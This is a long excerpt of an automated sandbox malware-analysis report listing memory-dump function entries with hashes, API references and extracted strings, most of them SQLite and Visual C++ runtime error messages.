                                                                • Opcode Fuzzy Hash: 54b77380b5f256ece8117f86d73eabc8343a7c84aafdb997a0188d2075b03113
                                                                • Instruction Fuzzy Hash: E861D5797042208FCB05DF18DC88E6677F4FB88724F4609AAED499B362D771E944CB92
                                                                Strings
                                                                • misuse, xrefs: 1D83AE18
                                                                • unable to delete/modify user-function due to active statements, xrefs: 1D83AD61
                                                                • %s at line %d of [%.10s], xrefs: 1D83AE1D
                                                                • ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1D83AE0E
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true
                                                                • Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: %s at line %d of [%.10s]$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse$unable to delete/modify user-function due to active statements
                                                                • API String ID: 0-3864549341
                                                                • Opcode ID: 20abacd8548c550ef2127df5e1dfbd76eb73df7926e7801dca42a33e93e53e1b
                                                                • Instruction ID: 1828ad8c71798cd1d52b602dd0971d7552984f32c424217248bd47eb7bceb4d1
                                                                • Opcode Fuzzy Hash: 20abacd8548c550ef2127df5e1dfbd76eb73df7926e7801dca42a33e93e53e1b
                                                                • Instruction Fuzzy Hash: 5C51A072A08344BFD7148F15DC80B6BF7E9EF89756F14492DF68A97251E322D8018BA3
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true
                                                                • Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: %s at line %d of [%.10s]$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse
                                                                • API String ID: 0-3564305576
                                                                • Opcode ID: b4abfd04842ea777c123101df63dbc3c64db6411bb5a73052dd9e50cc6b35d86
                                                                • Instruction ID: acb9e47d37457043b90db4ead20624e86a0d8c0f54253488ced042aadc41e2c5
                                                                • Opcode Fuzzy Hash: b4abfd04842ea777c123101df63dbc3c64db6411bb5a73052dd9e50cc6b35d86
                                                                • Instruction Fuzzy Hash: 59710570A04341BFD715DF28D846BABB7E4AF8531AF05442EE5998B243E731E445C793
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true
                                                                • Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: argument to %s() is not a valid SQL statement$bytecode$stmt-pointer$tables_used
                                                                • API String ID: 0-361449301
                                                                • Opcode ID: 9a06ceef8d8bc2ee5f671fdf0fa275ab5f09039ea2d17451823c809b08350771
                                                                • Instruction ID: b155b2922fc5ba324597e0da0aa960ad5b77f6373d8813f39f7192c6cc965147
                                                                • Opcode Fuzzy Hash: 9a06ceef8d8bc2ee5f671fdf0fa275ab5f09039ea2d17451823c809b08350771
                                                                • Instruction Fuzzy Hash: ED61F3715043029FE7119F24C98576377F4FF45328F21892EE9868B241E776E548CBA3
                                                                APIs
                                                                • GetModuleFileNameW.KERNEL32(00000000,1D9794C2,00000104), ref: 1D92EFDB
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true
                                                                • Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd
                                                                Similarity
                                                                • API ID: FileModuleName
                                                                • String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
                                                                • API String ID: 514040917-4022980321
                                                                • Opcode ID: 521a87ddc841eb239044749e5017708f1e71ae228251429684bf15d42403c0a6
                                                                • Instruction ID: 166dcd56fd74f2640a8a4ac9e127b26e109d00af5b915bac8504f601661ab21b
                                                                • Opcode Fuzzy Hash: 521a87ddc841eb239044749e5017708f1e71ae228251429684bf15d42403c0a6
                                                                • Instruction Fuzzy Hash: 0B216A37A84212B6D72359629C88FBB27AC8BC62A5F85052CFD0C9610AF621D504C2A7
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true
                                                                • Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: NEAR$fts5 expression tree is too large (maximum depth %d)$fts5: %s queries are not supported (detail!=full)$phrase
                                                                • API String ID: 0-593389478
                                                                • Opcode ID: e07c6f280c826389ccc45370c9c69503eafc72086f6b021c6c0c280424b6e428
                                                                • Instruction ID: 8e051e0bb2b045969d026a12ec031f0ca30a6914c9091b6cb8de343e59e4af20
                                                                • Opcode Fuzzy Hash: e07c6f280c826389ccc45370c9c69503eafc72086f6b021c6c0c280424b6e428
                                                                • Instruction Fuzzy Hash: 8C41F2396042069FD715CE24D880B7AB3A5EF94324F11476EF94A4B221E776F845CF93
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true
                                                                • Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: cannot detach database %s$database %s is locked$main$no such database: %s
                                                                • API String ID: 0-3838832555
                                                                • Opcode ID: 8e8bb22f59832164a4b23b0f751e10ddc2ec5a8bb0f52e7af7910cb4a90fc104
                                                                • Instruction ID: d7127b3a5a85a6de6ef90208129800853c53abdb4c09d782832f8ee07b74be50
                                                                • Opcode Fuzzy Hash: 8e8bb22f59832164a4b23b0f751e10ddc2ec5a8bb0f52e7af7910cb4a90fc104
                                                                • Instruction Fuzzy Hash: 5D519E756042019FE754CF05D8D0B2ABBA5FB85328F11855EED588B292EB31EC45CBB3
                                                                Strings
                                                                • unable to delete/modify collation sequence due to active statements, xrefs: 1D77F533
                                                                • misuse, xrefs: 1D77F4BA
                                                                • %s at line %d of [%.10s], xrefs: 1D77F4BF
                                                                • ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1D77F4B0
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true
                                                                • Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: %s at line %d of [%.10s]$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse$unable to delete/modify collation sequence due to active statements
                                                                • API String ID: 0-3348720253
                                                                • Opcode ID: 886532b303e6d29ecd17e337850624b3e7f6ff9455cf40d7520faa316de52d14
                                                                • Instruction ID: fc6b7006856c0947ceb2e061f6167e67f8098292364d30bd463c58409a7cc3ad
                                                                • Opcode Fuzzy Hash: 886532b303e6d29ecd17e337850624b3e7f6ff9455cf40d7520faa316de52d14
                                                                • Instruction Fuzzy Hash: F1411973608300ABDB008F18EC85B79F7E4EF81325F14496FF65887292E336E5158752
                                                                Strings
                                                                • CREATE TABLE x(term, col, documents, occurrences, languageid HIDDEN), xrefs: 1D764CCB
                                                                • invalid arguments to fts4aux constructor, xrefs: 1D764C9E
                                                                • temp, xrefs: 1D764C3E
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true
                                                                • Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: CREATE TABLE x(term, col, documents, occurrences, languageid HIDDEN)$invalid arguments to fts4aux constructor$temp
                                                                • API String ID: 0-537686372
                                                                • Opcode ID: 654f438c7af753c7167fdc307d4da0529fc719bb4e7257301ad3a371d7ccf998
                                                                • Instruction ID: 5bfcad218396f6bcec7b0b2cff7d794ec4a58a597c0df1041e25abbb0473d7a5
                                                                • Opcode Fuzzy Hash: 654f438c7af753c7167fdc307d4da0529fc719bb4e7257301ad3a371d7ccf998
                                                                • Instruction Fuzzy Hash: 7D414835108245AFD7148F58DC80AB67BE6EF44239F1584AFED998B312E732E901CB72
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true
                                                                • Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: %s at line %d of [%.10s]$database corruption$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f
                                                                • API String ID: 0-2528248365
                                                                • Opcode ID: ae704f898979ee5e79abe8dd0e72899a83cff51f15201d87a0fcc16de1856e19
                                                                • Instruction ID: e23c403e9a3032d72f64c35484117b02a09c6106d609fad774bcc88a538116df
                                                                • Opcode Fuzzy Hash: ae704f898979ee5e79abe8dd0e72899a83cff51f15201d87a0fcc16de1856e19
                                                                • Instruction Fuzzy Hash: 7F41E2716043515AE304DE29DC80ABABBE0EB80226F84897EED9983642F325E558D773
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true
                                                                • Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: %!.*f
                                                                • API String ID: 0-786758813
                                                                • Opcode ID: 0112fc5fcd276daa3a1f5fc72bf1e16f7c291b10f497e5dcf623329f1ad1a20d
                                                                • Instruction ID: d40ae4fe647ce4ff0bbc4fc1ff27cf533ee9b48cd5ea89f9b32bad6bbd64aeed
                                                                • Opcode Fuzzy Hash: 0112fc5fcd276daa3a1f5fc72bf1e16f7c291b10f497e5dcf623329f1ad1a20d
                                                                • Instruction Fuzzy Hash: 88315C35C08E119AD3079E389C1226B77E46F822B5F25C366EC466B113EB35A496C2D3
                                                                Strings
                                                                • %s at line %d of [%.10s], xrefs: 1D80EC51
                                                                • CREATE , xrefs: 1D80EBFF
                                                                • ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1D80EC42
                                                                • database corruption, xrefs: 1D80EC4C
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true
                                                                • Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: %s at line %d of [%.10s]$CREATE $database corruption$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f
                                                                • API String ID: 0-1360532505
                                                                • Opcode ID: 27c2aa65cc7add0e59965473bd96dbb6281aaccc049224979320f9a89f05a300
                                                                • Instruction ID: c8e9256d1c695d8344e22a9f13bbb4bee78a342d06f7a5e81744b5c55a16ac83
                                                                • Opcode Fuzzy Hash: 27c2aa65cc7add0e59965473bd96dbb6281aaccc049224979320f9a89f05a300
                                                                • Instruction Fuzzy Hash: E9312B625083C5A9D7124A5ADD40BB37BD5AF4121AF1840BFF9898E283E727D540C733
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true
                                                                • Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: API call with %s database connection pointer$bad parameter or other API misuse$invalid$out of memory
                                                                • API String ID: 0-453588374
                                                                • Opcode ID: d29043d22c8e74a1051db9c61b34bef970c447e1b3943007ae869642a821369d
                                                                • Instruction ID: db052323379cabadf6a6a5dad9ab8c3e6bbc3814a3b99156174c1b5d70008dcf
                                                                • Opcode Fuzzy Hash: d29043d22c8e74a1051db9c61b34bef970c447e1b3943007ae869642a821369d
                                                                • Instruction Fuzzy Hash: 1A3149B190474093FF194624DC05BBBA3569BC06B5F6A801BEC498BA42F225E84783B3
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true
                                                                • Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: %s at line %d of [%.10s]$database corruption$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f
                                                                • API String ID: 0-2528248365
                                                                • Opcode ID: 55d254b4be094c599460e44f241227b9e860cb39f2200c8105ca851134b2ff13
                                                                • Instruction ID: f5035a114773c17470a97ae3d6489fbae1bf9cfc01d248bef465c9d09c9eb2a5
                                                                • Opcode Fuzzy Hash: 55d254b4be094c599460e44f241227b9e860cb39f2200c8105ca851134b2ff13
                                                                • Instruction Fuzzy Hash: 44316E7A604B509BC324DF28D890AB3BBF29F85311F5084ADE6D64B757E332E841C752
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true
                                                                • Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: %s at line %d of [%.10s]$database corruption$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f
                                                                • API String ID: 0-2528248365
                                                                • Opcode ID: 4aff70db70698d3d4deceba07a4cbf931cb7e719ac6eb693cd0ab62b0a5dfe80
                                                                • Instruction ID: c73c37115fddeb16e36ffe5fc7eecc235611446b79905ae18c176f197efc148e
